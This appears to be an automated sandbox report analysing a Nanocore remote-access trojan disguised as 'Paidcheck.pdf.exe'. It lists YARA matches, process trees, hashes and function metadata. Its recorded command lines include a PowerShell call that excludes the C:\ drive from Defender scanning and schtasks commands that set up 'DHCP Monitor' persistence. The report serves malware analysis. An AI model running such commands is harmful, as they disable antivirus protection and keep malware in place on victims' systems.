                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          • Detection: 0%, Metadefender, Browse
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: powershell.exe PID: 748 Parent PID: 1968

                                                                          General

                                                                          Start time:09:33:43
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
                                                                          Imagebase:0x1260000
                                                                          File size:430592 bytes
                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 6096 Parent PID: 748

                                                                          General

                                                                          Start time:09:33:44
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: schtasks.exe PID: 5636 Parent PID: 2308

                                                                          General

                                                                          Start time:09:33:45
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 5784 Parent PID: 5636

                                                                          General

                                                                          Start time:09:33:47
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: schtasks.exe PID: 5848 Parent PID: 2308

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 2292 Parent PID: 5848

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: RegAsm.exe PID: 5432 Parent PID: 528

                                                                          General

                                                                          Start time:09:33:50
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                                                                          Imagebase:0xca0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 2992 Parent PID: 5432

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: dhcpmon.exe PID: 496 Parent PID: 528

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                                          Imagebase:0x2a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          • Detection: 0%, Metadefender, Browse
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 484 Parent PID: 496

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: dhcpmon.exe PID: 4300 Parent PID: 3388

                                                                          General

                                                                          Start time:09:33:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                          Imagebase:0x8a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET

                                                                          Chronological Activities

                                                                          Analysis Process: conhost.exe PID: 1036 Parent PID: 4300

                                                                          General

                                                                          Start time:09:33:57
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Chronological Activities

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Analysis Process: Paidcheck.pdf.exe PID: 4608 Parent PID: 5620 Paidcheck.pdf.exeCOMMON

                                                                            Executed Functions

                                                                            Function 06FF012D, Relevance: 2.0, Strings: 1, Instructions: 797COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D
                                                                            • API String ID: 0-2746444292
                                                                            • Opcode ID: b51f65d37b50132692c89528cd4df7be3954f43c240abe0edeb3e19209599ae4
                                                                            • Instruction ID: a8295e5c80323b57812b5d698f6522be6e250698e71699122c39cc879a51026e
                                                                            • Opcode Fuzzy Hash: b51f65d37b50132692c89528cd4df7be3954f43c240abe0edeb3e19209599ae4
                                                                            • Instruction Fuzzy Hash: 69721770A102188FDB94DF68C994B99B7F2BF88304F1585A9E60ADB366DF309D81CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07B28180, Relevance: .7, Instructions: 666COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.321343264.0000000007B20000.00000040.00000001.sdmp, Offset: 07B20000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7503d85642555b5affeb1614468cd90edc712c8c3298733c3dc4f5ac466e6db7
                                                                            • Instruction ID: 1611c231c2d5615a23ac9d50e35bfaff884a111e62305b27a41b8626fb42c62c
                                                                            • Opcode Fuzzy Hash: 7503d85642555b5affeb1614468cd90edc712c8c3298733c3dc4f5ac466e6db7
                                                                            • Instruction Fuzzy Hash: 1E4226B5A001249FDB55DF68C984E69BBB2FF49304F1681E8E5099B262CB31EC52DF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF963C, Relevance: .6, Instructions: 610COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66cc4038b9a40ae36e7f3653e0fae1cda52f38756867a49d728c11aaa9393c1f
                                                                            • Instruction ID: 31be42579994a5a2866a895ac5d44acd354a0b77840eadcd17d25da310d08973
                                                                            • Opcode Fuzzy Hash: 66cc4038b9a40ae36e7f3653e0fae1cda52f38756867a49d728c11aaa9393c1f
                                                                            • Instruction Fuzzy Hash: 82E1CD30B012008FDB69DB65C850BAEB7FAAF89700F14486EE645EB2A1CF75ED05CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF00FB, Relevance: .4, Instructions: 397COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddef7caf43bdc90d434aca983cfc9f26d69dba93fb164eecd9fc839ca8ef59f2
                                                                            • Instruction ID: 4eb27a68988706b4706d5f7919f684fbf71174c9dbfc433b0cd2e496120292a9
                                                                            • Opcode Fuzzy Hash: ddef7caf43bdc90d434aca983cfc9f26d69dba93fb164eecd9fc839ca8ef59f2
                                                                            • Instruction Fuzzy Hash: C602EC74A00169CFCB64DF29C898A99B7F2FF88310F1584D9D9199B362DB30AD81CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733FC48, Relevance: .3, Instructions: 271COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fcb17e566c53b3ad58a7454c6218859d5f100038146e9627ad72c4b94f80fc0d
                                                                            • Instruction ID: 2b286de61e356a43dcb5aed54a8162e524a2751939d9a9fbf03fea8beab26884
                                                                            • Opcode Fuzzy Hash: fcb17e566c53b3ad58a7454c6218859d5f100038146e9627ad72c4b94f80fc0d
                                                                            • Instruction Fuzzy Hash: 9AA17DB1E1112A9FEB25CB98C8806ADFBF1FF44305F548669E859E7205D734ED42CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5B6D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B748
                                                                            • GetCurrentThread.KERNEL32 ref: 00E5B785
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B7C2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5B81B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID: Pn
                                                                            • API String ID: 2063062207-1375425085
                                                                            • Opcode ID: d02f7af3e2f3efde6df393bf86ad6445946a0998ab1f3f4d8a9b43621a55a968
                                                                            • Instruction ID: c03453a9a1b2da93697ec39ac773606d8318239daffb7813b36e5377e982cacf
                                                                            • Opcode Fuzzy Hash: d02f7af3e2f3efde6df393bf86ad6445946a0998ab1f3f4d8a9b43621a55a968
                                                                            • Instruction Fuzzy Hash: 635177B09006498FDB14CFAAD5887DEBBF1EF88314F248559E419B7350DB349849CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5B6E8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B748
                                                                            • GetCurrentThread.KERNEL32 ref: 00E5B785
                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5B7C2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5B81B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID: Pn
                                                                            • API String ID: 2063062207-1375425085
                                                                            • Opcode ID: 76cb0f82607f320d31d18a84684cf19b9b4e6c75dac984b963c03635bdfe97e4
                                                                            • Instruction ID: 1e7a12085af8a507ed58b685636bdaed4485f581991199477a1499cb4ee14bad
                                                                            • Opcode Fuzzy Hash: 76cb0f82607f320d31d18a84684cf19b9b4e6c75dac984b963c03635bdfe97e4
                                                                            • Instruction Fuzzy Hash: 6A5156B0D006498FDB14CFAAD588B9EBBF1EF88314F248559E419B7350DB74A849CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7404, Relevance: 1.8, APIs: 1, Instructions: 272processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF7646
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: e3907e05c2f5499bb9a1ef90d7d973055533cea7f74863e8b2399c501040814b
                                                                            • Instruction ID: a08fbbf26e6e0fd1c2947a6a14bcf37397cdd96e8c34a8a759ae8eb45e143b60
                                                                            • Opcode Fuzzy Hash: e3907e05c2f5499bb9a1ef90d7d973055533cea7f74863e8b2399c501040814b
                                                                            • Instruction Fuzzy Hash: D3A17971D10219CFDB60DFA8D840BEEFBB2BF48314F1485A9E918A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF7410, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF7646
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: c97c5b1bf21fa32d0fdc1c17125d5a99ffa4e6d463c79578220a03fe9cafdda8
                                                                            • Instruction ID: d50001071391723dcbf702767f8930bf5089329861ccced5af19c73fa4544df9
                                                                            • Opcode Fuzzy Hash: c97c5b1bf21fa32d0fdc1c17125d5a99ffa4e6d463c79578220a03fe9cafdda8
                                                                            • Instruction Fuzzy Hash: A3917A71D10219CFDB50DFA8D880BEEFBB2BF48314F1485A9E918A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E593F0, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E59636
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 8be45705035b9d9d5e3f9eda7d718c83876964b6f5047f29a3221548cdd4a817
                                                                            • Instruction ID: fe0627aaae080489024cd0e105dc0b23d149971cbe38bd44feeca41fd9c307cc
                                                                            • Opcode Fuzzy Hash: 8be45705035b9d9d5e3f9eda7d718c83876964b6f5047f29a3221548cdd4a817
                                                                            • Instruction Fuzzy Hash: 217139B0A00B058FD764DF2AD1417AAB7F1FF88315F00492DD89AE7A41DB74E85ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF808C, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06FF8199
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: BaseModuleName
                                                                            • String ID:
                                                                            • API String ID: 595626670-0
                                                                            • Opcode ID: 27fd7681ec602aeeffa17abf225019511460f9fce720fc150d46126074b76cf8
                                                                            • Instruction ID: 27592fc935b538b0f496d204eedddf9028f900465f82386f3857b5c4e40a993e
                                                                            • Opcode Fuzzy Hash: 27fd7681ec602aeeffa17abf225019511460f9fce720fc150d46126074b76cf8
                                                                            • Instruction Fuzzy Hash: B15186B0D10208DFCB14CFA9C854BDEBBB1BF09354F148269E929AB360D774A845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5FD58, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E5FE6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: d884ad5cfa0f0d6bc324dbefd8bf98a4aef2424dc4c7a084c62a6865aaf8ffa6
                                                                            • Instruction ID: 0316909c33406a75c3365668a394bfbabb441570166c08938b6a477782f47878
                                                                            • Opcode Fuzzy Hash: d884ad5cfa0f0d6bc324dbefd8bf98a4aef2424dc4c7a084c62a6865aaf8ffa6
                                                                            • Instruction Fuzzy Hash: 4D41B0B1D00309DFDB14CF9AC884ADEFBB5BF48314F24852AE819AB210D774A945CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF8098, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 06FF8199
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: BaseModuleName
                                                                            • String ID:
                                                                            • API String ID: 595626670-0
                                                                            • Opcode ID: 7800805f71bca39d0e06a52ebf60300e9419f067c641e4b8b5de86086157f408
                                                                            • Instruction ID: ec2b13e2347705543e98dc005cf572bb4f58b09f13fb6ef739d8228721105149
                                                                            • Opcode Fuzzy Hash: 7800805f71bca39d0e06a52ebf60300e9419f067c641e4b8b5de86086157f408
                                                                            • Instruction Fuzzy Hash: 35412670D106488FDB14CFA9C898BDEBBF1BF48354F148629E929AB360D7749845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5FD4C, Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E5FE6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2616f5202fde7b34f7f956e5aecaff174539f56e4f375a56c00a0d044c389b12
                                                                            • Instruction ID: 000af29653e29c7bb06b8219e51a251fe992ad6e60cbb13bb57ed2cdbb9691c6
                                                                            • Opcode Fuzzy Hash: 2616f5202fde7b34f7f956e5aecaff174539f56e4f375a56c00a0d044c389b12
                                                                            • Instruction Fuzzy Hash: 8551C0B5D00349DFDB14CF99C984ADEBBB1BF48314F24852AE819AB211DB749945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E55348, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55401
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 6d7373b9166bd54e197831c3d859f5a486ec1da360a6b3ea592eae5f7195081b
                                                                            • Instruction ID: da2a84408c5f0de2ba3adf719e4f8b0ca35eb3710edf909ee248086f722ffe3f
                                                                            • Opcode Fuzzy Hash: 6d7373b9166bd54e197831c3d859f5a486ec1da360a6b3ea592eae5f7195081b
                                                                            • Instruction Fuzzy Hash: 71411271C00618CEDB20CFA9C884BDEFBB5BF88309F248469D419BB251DB75694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E538A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55401
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: ca5683df5ee5ab984edb160fc2c1a0a43af3b4b281016177368ebdec7061ed4c
                                                                            • Instruction ID: 19b0d58d353be4c82f23f6e85344d2843cb07892f3f58c0ceeea1c75d663a609
                                                                            • Opcode Fuzzy Hash: ca5683df5ee5ab984edb160fc2c1a0a43af3b4b281016177368ebdec7061ed4c
                                                                            • Instruction Fuzzy Hash: DC41E071C00618CFDB24CFA9C8447DEBBB5BF48309F248469D419BB251DBB5694ACF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06FF70D8, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.318797804.0000000006FF0000.00000040.00000001.sdmp, Offset: 06FF0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8fcfbfeee6b427cd98cbefea301f0e0d7fcd31f8a4528d607719a36f3cc1c97b
                                                                            • Instruction ID: 0b2509af1da73ddfdc2e1604528b9383db8238c7c5bb0df4b635f123ab9a9bcd
                                                                            • Opcode Fuzzy Hash: 8fcfbfeee6b427cd98cbefea301f0e0d7fcd31f8a4528d607719a36f3cc1c97b
